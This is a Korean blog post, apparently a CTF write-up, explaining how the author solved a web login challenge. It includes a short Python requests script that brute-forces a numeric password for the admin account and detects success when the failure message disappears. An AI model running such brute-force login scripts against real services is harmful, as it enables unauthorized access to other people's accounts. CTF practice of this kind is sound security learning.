티스토리 뷰
아이티고 ctf에서 나온 문제였는데, 서버가 닫혀 문제 사진은 없다.
id는 admin이였고 pw값이 1~10000 중 하나였다.
브루트포싱 문제였다.
코드이다
1 2 3 4 5 6 7 8 9 10 11 12 13 | import requests URL = 'http://problem.seoulit.kr/web/nv74vbcv/1.php' for i in range(0,10000) : data = {'id' : 'admin', 'pw' : i} res = requests.post(url=URL, data=data) print (i) print ("번째\n") if(not"not" in res.text): print("=") print(i) break | cs |
id는 계속 admin을 넣어주고 있고, pw값만 1씩 늘어난다.
pw가 틀리면 페이지에서 not어쩌구 문구와 함께 로그인에 실패한다.
그래서 로그인에 성공하면 not어쩌구 문구가 안뜰 것이니, 페이지에 not이라는 문구가 없으면 그 때의 i값이 pw 이다.
'programming > python' 카테고리의 다른 글
| angr 정리 (0) | 2018.07.07 |
|---|---|
| z3 정리 (0) | 2018.07.07 |
| 파이썬 BeautifulSoup를 이용해 네이버 실시간 검색어 웹 크롤러 만들기 (0) | 2018.03.05 |
| 파이썬 requests 모듈 기본 (0) | 2018.03.05 |
| [교육봉사][동아리 활동][python]마인크래프트로 배우는 파이썬 프로그래밍 (0) | 2017.12.17 |
Comments
최근에 올라온 글
최근에 달린 댓글
TAG
- heap
- tcache
- 본선가고싶다
- pwnable
- hacking
- overflow
- stack reusing
- srop
- pwnable.tw
- rt_sigreturn
- 해킹
- glibc
- HackCTF
- exit
- codegate
- fsop
- TLS
- pwable
- fastbindup
- oob
- ebp change
- FSB
- shellcoding
- fastbin
- SQLi
- Total
- Today
- Yesterday